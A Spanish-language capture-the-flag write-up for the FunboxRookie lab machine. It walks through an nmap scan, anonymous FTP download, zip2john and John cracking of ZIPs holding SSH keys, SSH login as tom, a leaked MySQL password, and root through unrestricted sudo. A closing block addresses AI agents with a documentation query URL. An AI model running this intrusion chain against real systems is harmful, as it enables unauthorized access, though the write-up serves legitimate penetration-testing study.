# OffSec FunboxRookie Observamos los puertos abiertos en el host ```rust nmap -sS -Pn -n -vvv --open --min-rate 5000 192.168.229.107 -oG port PORT STATE SERVICE REASON 21/tcp open ftp syn-ack ttl 61 22/tcp open ssh syn-ack ttl 61 80/tcp open http syn-ack ttl 61 ``` *** Escaneé el host **192.168.229.107** y encontré **FTP, SSH y HTTP** activos. El FTP permite acceso anónimo y contiene varios archivos ZIP con nombres de usuarios. El servicio SSH está disponible para acceso remoto y el servidor web Apache muestra la página por defecto, además de un `robots.txt` que oculta el directorio `/logs/`. ```rust ❯ nmap -sCV -p21,22,80 192.168.229.107 -oN target.txt Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-22 12:35 -0500 Nmap scan report for 192.168.229.107 Host is up (0.040s latency). PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5e | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip | -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip | -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip | -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg |_-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f9:46:7d:fe:0c:4d:a9:7e:2d:77:74:0f:a2:51:72:51 (RSA) | 256 15:00:46:67:80:9b:40:12:3a:0c:66:07:db:1d:18:47 (ECDSA) |_ 256 75:ba:66:95:bb:0f:16:de:7e:7e:a1:7b:27:3b:b0:58 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) | http-robots.txt: 1 disallowed entry |_/logs/ |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel ``` *** Me conecté al servidor **FTP** con el usuario **anonymous** y el acceso fue exitoso. Al listar el contenido, encontré varios **archivos ZIP con nombres de usuarios** y archivos ocultos como **.\@admins** y **.\@users**, que podrían contener información importante. Debido a esto, **vamos a descargar todos los archivos** para analizarlos localmente, lo cual se puede hacer usando el comando **`mget *`** desde la sesión FTP. ```rust ❯ ftp 192.168.229.107 Connected to 192.168.229.107. 220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.229.107] Name (192.168.229.107:kali): anonymous 331 Anonymous login ok, send your complete email address as your password Password: 230-Welcome, archive user anonymous@192.168.45.174 ! 230- 230-The local time is: Thu Jan 22 17:38:18 2026 230- 230-This is an experimental FTP server. If you have any unusual problems, 230-please report them via e-mail to . 230- 230 Anonymous access granted, restrictions apply Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -la 229 Entering Extended Passive Mode (|||19144|) 150 Opening ASCII mode data connection for file list drwxr-xr-x 2 ftp ftp 4096 Jul 25 2020 . drwxr-xr-x 2 ftp ftp 4096 Jul 25 2020 .. -rw-r--r-- 1 ftp ftp 153 Jul 25 2020 .@admins -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip -r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip -rw-r--r-- 1 ftp ftp 114 Jul 25 2020 .@users -rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg -rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip 226 Transfer complete ftp> ``` *** #### Zip2 Convertí todos los **ZIP** a hashes usando **`zip2john *.zip > hashes`**, con el objetivo de poder romper sus contraseñas después. El resultado muestra que todos los archivos están **protegidos con contraseña** y contienen un archivo **id\_rsa**, lo que indica que podrían ser **claves privadas SSH**, por lo que obtener la contraseña de alguno de estos ZIP podría dar acceso directo al sistema. ```javascript ❯ zip2john *.zip > hashes ver 2.0 efh 5455 efh 7875 anna.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 ariel.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 bud.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 cathrine.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 homer.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 jessica.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 john.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 marge.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 miriam.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 tom.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ver 2.0 efh 5455 efh 7875 zlatan.zip/id_rsa PKZIP Encr: TS_chk, cmplen=1299, decmplen=1675, crc=39C551E6 ts=554B cs=554b type=8 ``` Ejecuté **John the Ripper** con el diccionario *rockyou* y logré romper varias contraseñas de los archivos ZIP. En concreto, obtuve **“iubire”** para *tom.zip* y **“catwoman”** para *cathrine.zip*, ambos conteniendo un **id\_rsa**. Esto confirma que ya tenemos **claves privadas SSH protegidas**, lo que nos permite intentar acceso al sistema usando esos usuarios. ```javascript ❯ john -w:/usr/share/wordlists/rockyou.txt hashes Using default input encoding: UTF-8 Loaded 3 password hashes with 3 different salts (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status iubire (tom.zip/id_rsa) catwoman (cathrine.zip/id_rsa) 2g 0:00:00:01 DONE (2026-01-22 12:02) 1.869g/s 13405Kp/s 13420Kc/s 13420KC/s "2parrow"..*7¡Vamos! Warning: passwords printed above might not be all those cracked Use the "--show" option to display all of the cracked passwords reliably Session completed. ``` *** #### SSH Antes de conectarme por SSH fue necesario **ajustar los permisos de la clave privada**, ya que OpenSSH lo exige por seguridad, usando el comando **`chmod 600 id_rsa`**. Luego, con la **clave id\_rsa** obtenida y la contraseña crackeada del ZIP, logré acceder por **SSH como el usuario tom** al host **192.168.229.107**, obteniendo una **shell válida en el sistema** y confirmando el compromiso de la máquina. ```actionscript-3 ❯ ssh -i id_rsa tom@192.168.229.107 ** WARNING: connection is not using a post-quantum key exchange algorithm. ** This session may be vulnerable to "store now, decrypt later" attacks. ** The server may need to be upgraded. See https://openssh.com/pq.html Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-117-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage System information as of Thu Jan 22 17:43:25 UTC 2026 System load: 0.0 Processes: 162 Usage of /: 74.4% of 4.37GB Users logged in: 0 Memory usage: 36% IP address for ens256: 192.168.229.107 Swap usage: 0% 30 packages can be updated. 0 updates are security updates. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. To run a command as administrator (user "root"), use "sudo ". See "man sudo_root" for details. tom@funbox2:~$ ``` *** Una vez dentro como **tom**, revisé su directorio personal y encontré el archivo **local.txt**, que normalmente corresponde a la primera flag. Además, al revisar el archivo **.mysql\_history**, vi comandos relacionados con una base de datos *support* y una posible **contraseña (`xx11yy22!`)**, lo que sugiere credenciales reutilizadas o información útil para una futura escalada de privilegios. ```php tom@funbox2:~$ ls -la total 40 drwxr-xr-x 5 tom tom 4096 Jan 22 17:43 . drwxr-xr-x 3 root root 4096 Jul 25 2020 .. -rw------- 1 tom tom 0 Oct 14 2020 .bash_history -rw-r--r-- 1 tom tom 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 tom tom 3771 Apr 4 2018 .bashrc drwx------ 2 tom tom 4096 Jan 22 17:43 .cache drwx------ 3 tom tom 4096 Jul 25 2020 .gnupg -rw-r--r-- 1 tom tom 33 Jan 22 17:34 local.txt -rw------- 1 tom tom 295 Jul 25 2020 .mysql_history -rw-r--r-- 1 tom tom 807 Apr 4 2018 .profile drwx------ 2 tom tom 4096 Jul 25 2020 .ssh tom@funbox2:~$ cat .mysql_history _HiStOrY_V2_ show\040databases; quit create\040database\040'support'; create\040database\040support; use\040support create\040table\040users; show\040tables ; select\040*\040from\040support ; show\040tables; select\040*\040from\040support; insert\040into\040support\040(tom,\040xx11yy22!); quit tom@funbox2:~$ ``` *** #### Root Al ejecutar **`sudo -l`** comprobé que el usuario **tom** puede ejecutar **cualquier comando como root sin restricciones**, lo que indica una mala configuración de privilegios. Gracias a esto, simplemente usando **`sudo -i`** obtuve acceso directo como **root**, logrando así la **escalada total de privilegios** y el control completo del sistema. ```rust tom@funbox2:~$ sudo -l Matching Defaults entries for tom on funbox2: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User tom may run the following commands on funbox2: (ALL : ALL) ALL tom@funbox2:~$ tom@funbox2:~$ sudo -i root@funbox2:~# ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://rodgar.gitbook.io/rodgar/plataformas/vulnhub/offsec-funboxrookie.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.